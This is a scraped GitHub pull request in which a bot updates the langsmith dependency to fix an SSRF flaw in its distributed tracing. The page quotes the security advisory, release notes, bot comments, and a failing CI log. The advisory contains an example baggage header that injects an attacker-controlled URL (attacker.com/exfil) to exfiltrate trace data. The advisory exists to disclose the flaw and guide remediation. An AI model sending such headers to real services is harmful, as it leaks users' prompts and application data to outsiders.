fix(deps): update dependency langsmith to v0.4.6 [security] by renovate[bot] · Pull Request #4058 · liam-hq/liam

renovate · 2026-02-15T11:14:30Z

This PR contains the following updates:

Package	Change	Age	Confidence
langsmith	`0.3.73` → `0.4.6`

GitHub Vulnerability Alerts

CVE-2026-25528

Summary

The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.

Description

When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api_url and api_key fields.

Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.

Attack Vector

Attacker sends an HTTP request to a vulnerable service with a malicious baggage header:

baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]

The service parses the header via RunTree.from_headers(), storing the attacker's URL
When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to https://attacker.com/exfil

Impact

Data Exfiltration: Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
SSRF: Ability to make the server send requests to arbitrary URLs, potentially targeting internal services

Affected Use Cases

Applications are vulnerable if they:

Use TracingMiddleware to automatically propagate tracing context
Call RunTree.from_headers() / RunTree.fromHeaders() with untrusted HTTP headers

Remediation

Update to the patched versions:

Python: pip install langsmith>=0.6.3
JavaScript: npm install langsmith@>=0.4.6

The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.

Workarounds

If unable to upgrade immediately:

Strip or validate the baggage header before passing to from_headers()
Do not use TracingMiddleware with untrusted traffic

Release Notes

langchain-ai/langsmith-sdk (langsmith)

`v0.4.6`

Compare Source

What's Changed

If stream fails, fallback to buffered body request by @angus-langchain in #1845
fix(js): Fix replica updates by @jacoblee93 in #1848
feat(js): Support feedback attribution for OTEL evaluations by @jacoblee93 in #1847
fix(js): Propagate microseconds added in dotted order conversion to run tree start time by @jacoblee93 in #1849
fix(js): Respect project names set at runtime for OTEL exported traces by @jacoblee93 in #1850
feat(python): Add repetitions support to pytest, rename in JS by @jacoblee93 in #1852

Full Changelog: langchain-ai/langsmith-sdk@v0.4.5...v0.4.6

`v0.4.5`

Compare Source

What's Changed

feat(js): Add OTEL support by @jacoblee93 in #1814
feat(js): Export passed AI SDK metadata as LangSmith metadata by @jacoblee93 in #1819
Reduce zstd compression level to 1 by @angus-langchain in #1820
feat(js): Add transform span method to exporter, allow setting run name by @jacoblee93 in #1821
fix(js): Use context placeholder to preserve LangChain context variables even if tracing is disabled by @jacoblee93 in #1822
fix(js): Fix types and add responses and completions.parse support for wrapOpenAI by @jacoblee93 in #1823
release(js): 0.3.38 by @jacoblee93 in #1824
fix(js): Fix AI SDK token counting issues for legacy exporter by @jacoblee93 in #1825
feat(js): Make traced AI SDK runs respect provider metadata by @jacoblee93 in #1826
feat(js): Add reference_example_id attribute to OTEL runs by @jacoblee93 in #1836
[open-swe] fix: improve serialization of Maps and complex objects in traces by @open-swe[bot] in #1835
release(js): 0.3.41 by @jacoblee93 in #1837
fix(js): Add endpoint shim to example upload by @jacoblee93 in #1839
Add runs endpoints env to replicas by @hinthornw in #1830
release(js): 0.3.42 by @jacoblee93 in #1842
feat(python): Populate example metadata in pytest, prefix experiment runs with ls_example by @jacoblee93 in #1840

New Contributors

@open-swe[bot] made their first contribution in #1835

Full Changelog: langchain-ai/langsmith-sdk@v0.4.4...v0.4.5

`v0.4.4`

Compare Source

What's Changed

Add replicas to baggage header by @angus-langchain in #1817

Full Changelog: langchain-ai/langsmith-sdk@v0.4.3...v0.4.4

`v0.4.3`

Compare Source

What's Changed

feat(js): Allow suppressing circular JSON warnings by @jacoblee93 in #1815
fix(py): loosen pydantic dep by @baskaryan in #1816

Full Changelog: langchain-ai/langsmith-sdk@v0.4.2...v0.4.3

`v0.4.2`

Compare Source

What's Changed

Add agent instructions for Python SDK by @nfcampos in #1776
Fix some issues w running codex in this repo by @nfcampos in #1777
Fix race for cached client initialization by @nfcampos in #1778
Handle missing attachment files gracefully by @nfcampos in #1782
fix(js): Fix JSDom check for Node 22 by @jacoblee93 in #1784
Cache request settings for Client by @nfcampos in #1787
chore: auto-label issues with 'sdk' label by @madams0013 in #1791
Store only the first new_token event by @nfcampos in #1779
fix(js): Pass events through on run create by @jacoblee93 in #1794
fix(js): Avoid overwriting runtime if already set by @jacoblee93 in #1795
feat(js): Add replica support for JS by @jacoblee93 in #1796
release(js): 0.3.32 by @jacoblee93 in #1797
add util for getting project name from env var by @lc-arjun in #1801
patch[python]: Only set replica updates on patch by @angus-langchain in #1798
feat[python]: Trace to multiple projects with distributed tracing by @angus-langchain in #1804
feat[python]: Enable OpenTelemetry trace context propagation by @angus-langchain in #1805
chore(deps): bump protobuf from 5.29.4 to 5.29.5 in /python by @dependabot in #1807
feat(py): add evaluate(..., error_handling="ignore") by @baskaryan in #1774

New Contributors

@lc-arjun made their first contribution in #1801

Full Changelog: langchain-ai/langsmith-sdk@v0.4.1...v0.4.2

`v0.4.1`

Compare Source

What's Changed

fix: hybrid mode has subtle shut down race conditoin by @EugeneJinXin in #1775

Full Changelog: langchain-ai/langsmith-sdk@v0.4.0...v0.4.1

`v0.4.0`

What's Changed

feat: OTEL_ENABLED mode sends to both otel and ls, while allowing otel only through OTEL_ONLY var by @EugeneJinXin in #1762

New Contributors

@EugeneJinXin made their first contribution in #1762

Full Changelog: langchain-ai/langsmith-sdk@v0.3.45...v0.4.0

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

vercel · 2026-02-15T11:14:33Z

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
liam-app	Ready	Preview, Comment	Mar 14, 2026 9:07pm
liam-assets	Ready	Preview, Comment	Mar 14, 2026 9:07pm
liam-docs	Ready	Preview, Comment	Mar 14, 2026 9:07pm
liam-erd-sample	Ready	Preview, Comment	Mar 14, 2026 9:07pm
liam-storybook	Ready	Preview, Comment	Mar 14, 2026 9:07pm

giselles-ai · 2026-02-15T11:14:34Z

Finished running flow.

Step 1
🟢	On Pull Request Opened Status: Success Updated: Feb 15, 2026 11:14am
Step 2
🟢	gpt-5 Status: Success Updated: Feb 15, 2026 11:15am
Step 3
🟢	Create Pull Request Comment Status: Success Updated: Feb 15, 2026 11:15am

giselles-ai · 2026-02-15T11:15:52Z

Check changeset necessity

Status: NOT REQUIRED

Reason:

The only affected packages are internal: @liam-hq/agent and @liam-hq/schema-bench, both listed in the ignored packages.
No changes to target, user-facing packages (@liam-hq/cli, @liam-hq/erd-core, @liam-hq/schema, @liam-hq/ui).
The PR updates a third-party dependency (langsmith) and lockfiles/config only; no public API or behavior change in target packages.
This is a security/maintenance dependency bump within ignored/internal packages, which does not require a release.

Changeset (copy & paste):

<!-- No changeset required for this PR -->

devin-ai-integration

✅ Devin Review: No Issues Found

Devin Review analyzed this PR and found no potential bugs to report.

View in Devin Review to see 3 additional findings.

github-actions · 2026-02-15T11:17:41Z

🤖 Agent Deep Modeling Execution

Started at: 2026-03-14 21:06:35 UTC

View Details

Command Output

@liam-hq/agent@0.1.0 execute-deep-modeling /home/runner/work/liam/liam/frontend/internal-packages/agent
pnpm test:integration src/createGraph.integration.test.ts

@liam-hq/agent@0.1.0 test:integration /home/runner/work/liam/liam/frontend/internal-packages/agent
vitest --watch=false --passWithNoTests --config vitest.config.integration.ts src/createGraph.integration.test.ts

RUN v3.2.4 /home/runner/work/liam/liam/frontend/internal-packages/agent

(node:8028) ExperimentalWarning: WASI is an experimental feature and might change at any time
(Use node --trace-warnings ... to show where the warning was created)

✅ [INFO] 2026-03-14T21:06:37.962Z
LangSmith Trace URL: https://smith.langchain.com/o/eed4d2d8-0bd8-4ca4-a452-4da88ef63fd6/projects/p/9324fe51-27a4-4604-a52b-c6cc240f6dcc?searchModel=%7B%22filter%22%3A%22and(eq(is_root%2C%20true)%2C%20and(eq(metadata_key%2C%20%5C%22thread_id%5C%22)%2C%20eq(metadata_value%2C%20%5C%2272040d6d-f89d-4cde-a697-5785106b7c21%5C%22)))%22%7D
stderr | src/createGraph.integration.test.ts > createGraph Integration > should execute complete workflow
Failed to Failed to send multipart request. Received status [403]: Forbidden. Message:

Context: trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=52c390bb-06e3-4d5c-ad67-40c5e920c53a; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=d273f480-9301-4ee2-803b-063e02fbb0a3; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=9138c76b-368c-4dbe-a5e2-006a0f1da4a8; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=2e413fbe-1089-42a7-a856-d65711114eb6; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=0d99294e-7530-40b1-87e8-129fa95154a4; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=0f731089-c717-494f-811c-ec4158bd1dc3; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=60d629f5-df2a-426f-b14d-dfa4cb884d9d; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=d341b23a-11e8-46b2-abd5-ae3025d08d4e; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=b931fe91-3afd-4f55-817d-1e1f07462a6f; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=ee66a441-0bf9-417e-b005-84d9e15c20e7; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=ff7ce00c-e144-48dd-b686-33e5800de62b; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=4a738887-17e0-4c1e-ba77-920c553445b8; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=f86f4ae7-8151-4cc9-847c-a243c95dba28; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=f4c5a5dd-95f0-4915-b6d4-78b204a8c2ff; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=fec20c4e-2410-429c-8422-db349a1cdafb; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=1ca94c12-46fb-471c-b911-0a2eb29c0ff9; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=969ae3fb-9976-4a86-894f-170a6694e181; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=a29d25aa-190b-498f-a3d0-4e6873019d4f; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=a4ba5b33-127f-4dea-9bb9-82f684fa6c19; trace=52c390bb-06e3-4d5c-ad67-40c5e920c53a,id=0c91f83b-c582-4899-8caf-dc3b07fda8bf

x

⎯⎯⎯⎯⎯⎯⎯ Failed Tests 1 ⎯⎯⎯⎯⎯⎯⎯

FAIL src/createGraph.integration.test.ts > createGraph Integration > should execute complete workflow
WorkflowTerminationError: Error in analyzeRequirementsNode: 401 Incorrect API key provided: sk-proj-********************************************************************************************************************************************************N7kA. You can find your API key at https://platform.openai.com/account/api-keys.

Troubleshooting URL: https://js.langchain.com/docs/troubleshooting/errors/MODEL_AUTHENTICATION/

❯ RunnableCallable.analyzeRequirementsNode [as func] src/pm-agent/nodes/analyzeRequirementsNode.ts:38:11
36|
37| if (analysisResult.isErr()) {
38| throw new WorkflowTerminationError(
| ^
39| analysisResult.error,
40| 'analyzeRequirementsNode',
❯ RunnableCallable.invoke ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9_@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/utils.ts:85:21
❯ RunnableSequence.invoke ../../../node_modules/.pnpm/@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemetry+sdk-trace-base@2.2.0_@op_0a8880fa2f45d0308ed941fc53f9c9f1/node_modules/@langchain/core/dist/runnables/base.js:1308:33
❯ runWithRetry ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/pregel/retry.ts:103:16
❯ PregelRunner.executeTasksWithRetry ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/pregel/runner.ts:330:27
❯ PregelRunner.tick ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9_@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/pregel/runner.ts:138:50
❯ CompiledStateGraph.runLoop ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/pregel/index.ts:2233:9
❯ createAndRunLoop ../../../node_modules/.pnpm/@langchain+langgraph@0.4.9_@langchain+core@0.3.78_@opentelemetry+api@1.9.0_@opentelemet_cd940287faf0db93d41d5fc1f29067cc/node_modules/@langchain/langgraph/src/pregel/index.ts:2092:9

⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯⎯[1/1]⎯

Test Files 1 failed (1)
Tests 1 failed (1)
Start at 21:06:36
Duration 2.32s (transform 490ms, setup 0ms, collect 1.50s, tests 547ms, environment 0ms, prepare 74ms)

ELIFECYCLE Command failed with exit code 1.
/home/runner/work/liam/liam/frontend/internal-packages/agent:
ERR_PNPM_RECURSIVE_RUN_FIRST_FAIL @liam-hq/agent@0.1.0 execute-deep-modeling: pnpm test:integration src/createGraph.integration.test.ts
Exit status 1

renovate bot requested a review from a team as a code owner February 15, 2026 11:14

renovate bot requested review from NoritakaIkeda and sasamuku and removed request for a team February 15, 2026 11:14

vercel bot deployed to Preview – liam-assets February 15, 2026 11:14 View deployment

vercel bot deployed to Preview – liam-erd-sample February 15, 2026 11:15 View deployment

vercel bot deployed to Preview – liam-storybook February 15, 2026 11:16 View deployment

vercel bot deployed to Preview – liam-docs February 15, 2026 11:16 View deployment

devin-ai-integration bot reviewed Feb 15, 2026

View reviewed changes

vercel bot deployed to Preview – liam-app February 15, 2026 11:19 View deployment

fix(deps): update dependency langsmith to v0.4.6 [security]

2557f77

renovate bot force-pushed the renovate/npm-langsmith-vulnerability branch from 80175f6 to 2557f77 Compare March 14, 2026 21:02

vercel bot deployed to Preview – liam-erd-sample March 14, 2026 21:03 View deployment

vercel bot deployed to Preview – liam-assets March 14, 2026 21:03 View deployment

vercel bot deployed to Preview – liam-storybook March 14, 2026 21:04 View deployment

vercel bot deployed to Preview – liam-docs March 14, 2026 21:04 View deployment

vercel bot deployed to Preview – liam-app March 14, 2026 21:07 View deployment

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix(deps): update dependency langsmith to v0.4.6 [security]#4058

fix(deps): update dependency langsmith to v0.4.6 [security]#4058
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-langsmith-vulnerability

renovate bot commented Feb 15, 2026 •

edited

Loading

Uh oh!

vercel bot commented Feb 15, 2026 •

edited

Loading

Uh oh!

giselles-ai bot commented Feb 15, 2026 •

edited

Loading

Uh oh!

giselles-ai bot commented Feb 15, 2026

Uh oh!

devin-ai-integration bot left a comment

Uh oh!

github-actions bot commented Feb 15, 2026 •

edited

Loading

Command Output

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

Conversation

renovate bot commented Feb 15, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

GitHub Vulnerability Alerts

Summary

Description

Attack Vector

Impact

Affected Use Cases

Remediation

Workarounds

Release Notes

What's Changed

What's Changed

New Contributors

What's Changed

What's Changed

What's Changed

New Contributors

What's Changed

What's Changed

New Contributors

Configuration

Uh oh!

vercel bot commented Feb 15, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

giselles-ai bot commented Feb 15, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

giselles-ai bot commented Feb 15, 2026

Check changeset necessity

Reason:

Changeset (copy & paste):

Uh oh!

devin-ai-integration bot left a comment

Choose a reason for hiding this comment

✅ Devin Review: No Issues Found

Uh oh!

github-actions bot commented Feb 15, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

🤖 Agent Deep Modeling Execution

Command Output

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

renovate bot commented Feb 15, 2026 •

edited

Loading

vercel bot commented Feb 15, 2026 •

edited

Loading

giselles-ai bot commented Feb 15, 2026 •

edited

Loading

github-actions bot commented Feb 15, 2026 •

edited

Loading